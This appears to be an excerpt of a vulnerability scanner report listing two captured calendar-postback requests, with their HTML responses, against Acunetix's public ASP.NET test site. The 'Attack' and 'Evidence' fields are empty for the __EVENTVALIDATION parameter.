Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8532&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAV9R7UtsIZGRk7fNW8T2OKEhAbRK4c%2FSyAHRVAPw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLgIqGCgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1M8sM%2FVFr%2F4OEZgdzndPEqOsl05
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:21 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAV9R7UtsIZGRk7fNW8T2OKEhAbRK4c/SyAHRVAPw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLgIqGCgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1M8sM/VFr/4OEZgdzndPEqOsl05" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:White" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8463&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCA1mVDHNsIZGRkv2re9D9mRmp4QVOOGndWK9ViApc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLo8%2BoAQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ9CbeFF6s%2B7CNVLchcNKFqlB%2BvKQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:45 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCA1mVDHNsIZGRkv2re9D9mRmp4QVOOGndWK9ViApc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLo8+oAQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ9CbeFF6s+7CNVLchcNKFqlB+vKQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:White" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
